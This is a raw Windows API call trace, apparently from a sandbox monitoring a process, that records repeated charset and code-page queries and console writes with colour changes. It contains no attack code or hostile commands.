[0085.935] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.935] GetConsoleOutputCP () returned 0x1b5
[0085.935] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.935] GetConsoleOutputCP () returned 0x1b5
[0085.935] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.935] GetConsoleOutputCP () returned 0x1b5
[0085.936] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.936] GetConsoleOutputCP () returned 0x1b5
[0085.936] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.936] GetConsoleOutputCP () returned 0x1b5
[0085.936] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.936] GetConsoleOutputCP () returned 0x1b5
[0085.936] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.936] GetConsoleOutputCP () returned 0x1b5
[0085.936] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.936] GetConsoleOutputCP () returned 0x1b5
[0085.936] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.936] GetConsoleOutputCP () returned 0x1b5
[0085.936] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.936] GetConsoleOutputCP () returned 0x1b5
[0085.936] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.936] GetConsoleOutputCP () returned 0x1b5
[0085.936] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.936] GetConsoleOutputCP () returned 0x1b5
[0085.936] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.936] GetConsoleOutputCP () returned 0x1b5
[0085.937] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.937] GetConsoleOutputCP () returned 0x1b5
[0085.937] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.937] GetConsoleOutputCP () returned 0x1b5
[0085.937] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.937] GetConsoleOutputCP () returned 0x1b5
[0085.937] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.937] GetConsoleOutputCP () returned 0x1b5
[0085.937] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.937] GetConsoleOutputCP () returned 0x1b5
[0085.937] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.937] GetConsoleOutputCP () returned 0x1b5
[0085.937] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.937] GetConsoleOutputCP () returned 0x1b5
[0085.937] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.937] GetConsoleOutputCP () returned 0x1b5
[0085.937] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.937] GetConsoleOutputCP () returned 0x1b5
[0085.938] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.938] GetConsoleOutputCP () returned 0x1b5
[0085.938] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.938] GetConsoleOutputCP () returned 0x1b5
[0085.938] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.938] GetConsoleOutputCP () returned 0x1b5
[0085.938] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.938] GetConsoleOutputCP () returned 0x1b5
[0085.938] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.938] GetConsoleOutputCP () returned 0x1b5
[0085.938] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.938] GetConsoleOutputCP () returned 0x1b5
[0085.938] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.938] GetConsoleOutputCP () returned 0x1b5
[0085.938] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.938] GetConsoleOutputCP () returned 0x1b5
[0085.938] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.938] GetConsoleOutputCP () returned 0x1b5
[0085.939] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.939] GetConsoleOutputCP () returned 0x1b5
[0085.939] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.939] GetConsoleOutputCP () returned 0x1b5
[0085.939] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.939] GetConsoleOutputCP () returned 0x1b5
[0085.939] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.939] GetConsoleOutputCP () returned 0x1b5
[0085.939] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.939] GetConsoleOutputCP () returned 0x1b5
[0085.939] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.939] GetConsoleOutputCP () returned 0x1b5
[0085.939] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.939] GetConsoleOutputCP () returned 0x1b5
[0085.939] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.939] GetConsoleOutputCP () returned 0x1b5
[0085.940] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.940] GetConsoleOutputCP () returned 0x1b5
[0085.940] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.940] GetConsoleOutputCP () returned 0x1b5
[0085.940] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.940] GetConsoleOutputCP () returned 0x1b5
[0085.940] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.940] GetConsoleOutputCP () returned 0x1b5
[0085.940] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.940] GetConsoleOutputCP () returned 0x1b5
[0085.940] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.940] GetConsoleOutputCP () returned 0x1b5
[0085.940] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.940] GetConsoleOutputCP () returned 0x1b5
[0085.940] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.940] GetConsoleOutputCP () returned 0x1b5
[0085.940] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.941] GetConsoleOutputCP () returned 0x1b5
[0085.941] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.941] GetConsoleOutputCP () returned 0x1b5
[0085.941] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.941] GetConsoleOutputCP () returned 0x1b5
[0085.941] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.941] GetConsoleOutputCP () returned 0x1b5
[0085.941] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a1d0) returned 0
[0085.941] GetConsoleOutputCP () returned 0x1b5
[0085.941] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.941] GetConsoleOutputCP () returned 0x1b5
[0085.941] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.941] GetConsoleOutputCP () returned 0x1b5
[0085.941] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.941] GetConsoleOutputCP () returned 0x1b5
[0085.941] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.003] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17
[0086.003] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x17, lpConsoleScreenBufferInfo=0x1c81a1e0 | out: lpConsoleScreenBufferInfo=0x1c81a1e0) returned 1
[0086.004] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb
[0086.008] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b
[0086.008] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x1b, lpConsoleScreenBufferInfo=0x1c81a090 | out: lpConsoleScreenBufferInfo=0x1c81a090) returned 1
[0086.009] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x1f, lpConsoleScreenBufferInfo=0x1c81a090 | out: lpConsoleScreenBufferInfo=0x1c81a090) returned 1
[0086.012] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23
[0086.012] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.013] SetConsoleTextAttribute (hConsoleOutput=0x23, wAttributes=0xc) returned 1
[0086.016] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23
[0086.016] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.016] SetConsoleTextAttribute (hConsoleOutput=0x23, wAttributes=0xc) returned 1
[0086.017] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0086.020] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23
[0086.020] GetConsoleMode (in: hConsoleHandle=0x23, lpMode=0x1c81a140 | out: lpMode=0x1c81a140) returned 1
[0086.021] WriteConsoleW (in: hConsoleOutput=0x23, lpBuffer=0x3319b90*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0x1c81a110, lpReserved=0x0 | out: lpBuffer=0x3319b90*, lpNumberOfCharsWritten=0x1c81a110*=0x4f) returned 1
[0086.033] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.033] SetConsoleTextAttribute (hConsoleOutput=0x23, wAttributes=0x7) returned 1
[0086.033] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.034] SetConsoleTextAttribute (hConsoleOutput=0x23, wAttributes=0x7) returned 1
[0086.034] WriteConsoleW (in: hConsoleOutput=0x23, lpBuffer=0x2d2f608*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1c81a1b0, lpReserved=0x0 | out: lpBuffer=0x2d2f608*, lpNumberOfCharsWritten=0x1c81a1b0*=0x1) returned 1
[0086.038] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23
[0086.038] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x1c81a1e0 | out: lpConsoleScreenBufferInfo=0x1c81a1e0) returned 1
[0086.039] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x27, lpConsoleScreenBufferInfo=0x1c81a090 | out: lpConsoleScreenBufferInfo=0x1c81a090) returned 1
[0086.039] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2b, lpConsoleScreenBufferInfo=0x1c81a090 | out: lpConsoleScreenBufferInfo=0x1c81a090) returned 1
[0086.039] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.040] SetConsoleTextAttribute (hConsoleOutput=0x2f, wAttributes=0xc) returned 1
[0086.040] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.040] SetConsoleTextAttribute (hConsoleOutput=0x2f, wAttributes=0xc) returned 1
[0086.041] WriteConsoleW (in: hConsoleOutput=0x2f, lpBuffer=0x331a4e0*, nNumberOfCharsToWrite=0x33, lpNumberOfCharsWritten=0x1c81a110, lpReserved=0x0 | out: lpBuffer=0x331a4e0*, lpNumberOfCharsWritten=0x1c81a110*=0x33) returned 1
[0086.042] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.042] SetConsoleTextAttribute (hConsoleOutput=0x2f, wAttributes=0x7) returned 1
[0086.042] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.042] SetConsoleTextAttribute (hConsoleOutput=0x2f, wAttributes=0x7) returned 1
[0086.043] WriteConsoleW (in: hConsoleOutput=0x2f, lpBuffer=0x2d2f608*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1c81a1b0, lpReserved=0x0 | out: lpBuffer=0x2d2f608*, lpNumberOfCharsWritten=0x1c81a1b0*=0x1) returned 1
[0086.043] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x1c81a1e0 | out: lpConsoleScreenBufferInfo=0x1c81a1e0) returned 1
[0086.044] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x33, lpConsoleScreenBufferInfo=0x1c81a090 | out: lpConsoleScreenBufferInfo=0x1c81a090) returned 1
[0086.044] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x37, lpConsoleScreenBufferInfo=0x1c81a090 | out: lpConsoleScreenBufferInfo=0x1c81a090) returned 1
[0086.044] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.044] SetConsoleTextAttribute (hConsoleOutput=0x3b, wAttributes=0xc) returned 1
[0086.045] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.045] SetConsoleTextAttribute (hConsoleOutput=0x3b, wAttributes=0xc) returned 1
[0086.046] WriteConsoleW (in: hConsoleOutput=0x3b, lpBuffer=0x331aaf0*, nNumberOfCharsToWrite=0x12, lpNumberOfCharsWritten=0x1c81a110, lpReserved=0x0 | out: lpBuffer=0x331aaf0*, lpNumberOfCharsWritten=0x1c81a110*=0x12) returned 1
[0086.046] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.046] SetConsoleTextAttribute (hConsoleOutput=0x3b, wAttributes=0x7) returned 1
[0086.047] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.047] SetConsoleTextAttribute (hConsoleOutput=0x3b, wAttributes=0x7) returned 1
[0086.048] WriteConsoleW (in: hConsoleOutput=0x3b, lpBuffer=0x2d2f608*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1c81a1b0, lpReserved=0x0 | out: lpBuffer=0x2d2f608*, lpNumberOfCharsWritten=0x1c81a1b0*=0x1) returned 1
[0086.048] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x1c81a1e0 | out: lpConsoleScreenBufferInfo=0x1c81a1e0) returned 1
[0086.048] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3f, lpConsoleScreenBufferInfo=0x1c81a090 | out: lpConsoleScreenBufferInfo=0x1c81a090) returned 1
[0086.049] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x43, lpConsoleScreenBufferInfo=0x1c81a090 | out: lpConsoleScreenBufferInfo=0x1c81a090) returned 1
[0086.049] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.049] SetConsoleTextAttribute (hConsoleOutput=0x47, wAttributes=0xc) returned 1
[0086.049] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.050] SetConsoleTextAttribute (hConsoleOutput=0x47, wAttributes=0xc) returned 1
[0086.050] WriteConsoleW (in: hConsoleOutput=0x47, lpBuffer=0x331b138*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0x1c81a110, lpReserved=0x0 | out: lpBuffer=0x331b138*, lpNumberOfCharsWritten=0x1c81a110*=0x4f) returned 1
[0086.051] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.051] SetConsoleTextAttribute (hConsoleOutput=0x47, wAttributes=0x7) returned 1
[0086.051] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.052] SetConsoleTextAttribute (hConsoleOutput=0x47, wAttributes=0x7) returned 1
[0086.052] WriteConsoleW (in: hConsoleOutput=0x47, lpBuffer=0x2d2f608*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1c81a1b0, lpReserved=0x0 | out: lpBuffer=0x2d2f608*, lpNumberOfCharsWritten=0x1c81a1b0*=0x1) returned 1
[0086.053] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x1c81a1e0 | out: lpConsoleScreenBufferInfo=0x1c81a1e0) returned 1
[0086.053] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x4b, lpConsoleScreenBufferInfo=0x1c81a090 | out: lpConsoleScreenBufferInfo=0x1c81a090) returned 1
[0086.053] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x4f, lpConsoleScreenBufferInfo=0x1c81a090 | out: lpConsoleScreenBufferInfo=0x1c81a090) returned 1
[0086.054] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.054] SetConsoleTextAttribute (hConsoleOutput=0x53, wAttributes=0xc) returned 1
[0086.054] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.054] SetConsoleTextAttribute (hConsoleOutput=0x53, wAttributes=0xc) returned 1
[0086.055] WriteConsoleW (in: hConsoleOutput=0x53, lpBuffer=0x331b938*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0x1c81a110, lpReserved=0x0 | out: lpBuffer=0x331b938*, lpNumberOfCharsWritten=0x1c81a110*=0x4f) returned 1
[0086.055] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.056] SetConsoleTextAttribute (hConsoleOutput=0x53, wAttributes=0x7) returned 1
[0086.056] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.056] SetConsoleTextAttribute (hConsoleOutput=0x53, wAttributes=0x7) returned 1
[0086.057] WriteConsoleW (in: hConsoleOutput=0x53, lpBuffer=0x2d2f608*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1c81a1b0, lpReserved=0x0 | out: lpBuffer=0x2d2f608*, lpNumberOfCharsWritten=0x1c81a1b0*=0x1) returned 1
[0086.057] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x1c81a1e0 | out: lpConsoleScreenBufferInfo=0x1c81a1e0) returned 1
[0086.057] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x57, lpConsoleScreenBufferInfo=0x1c81a090 | out: lpConsoleScreenBufferInfo=0x1c81a090) returned 1
[0086.058] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5b, lpConsoleScreenBufferInfo=0x1c81a090 | out: lpConsoleScreenBufferInfo=0x1c81a090) returned 1
[0086.058] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.058] SetConsoleTextAttribute (hConsoleOutput=0x5f, wAttributes=0xc) returned 1
[0086.059] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.059] SetConsoleTextAttribute (hConsoleOutput=0x5f, wAttributes=0xc) returned 1
[0086.059] WriteConsoleW (in: hConsoleOutput=0x5f, lpBuffer=0x331c138*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0x1c81a110, lpReserved=0x0 | out: lpBuffer=0x331c138*, lpNumberOfCharsWritten=0x1c81a110*=0x4f) returned 1
[0086.060] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.060] SetConsoleTextAttribute (hConsoleOutput=0x5f, wAttributes=0x7) returned 1
[0086.060] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.061] SetConsoleTextAttribute (hConsoleOutput=0x5f, wAttributes=0x7) returned 1
[0086.061] WriteConsoleW (in: hConsoleOutput=0x5f, lpBuffer=0x2d2f608*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1c81a1b0, lpReserved=0x0 | out: lpBuffer=0x2d2f608*, lpNumberOfCharsWritten=0x1c81a1b0*=0x1) returned 1
[0086.062] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x1c81a1e0 | out: lpConsoleScreenBufferInfo=0x1c81a1e0) returned 1
[0086.062] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x63, lpConsoleScreenBufferInfo=0x1c81a090 | out: lpConsoleScreenBufferInfo=0x1c81a090) returned 1
[0086.062] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x67, lpConsoleScreenBufferInfo=0x1c81a090 | out: lpConsoleScreenBufferInfo=0x1c81a090) returned 1
[0086.063] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.063] SetConsoleTextAttribute (hConsoleOutput=0x6b, wAttributes=0xc) returned 1
[0086.063] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.063] SetConsoleTextAttribute (hConsoleOutput=0x6b, wAttributes=0xc) returned 1
[0086.064] WriteConsoleW (in: hConsoleOutput=0x6b, lpBuffer=0x331c938*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0x1c81a110, lpReserved=0x0 | out: lpBuffer=0x331c938*, lpNumberOfCharsWritten=0x1c81a110*=0x4f) returned 1
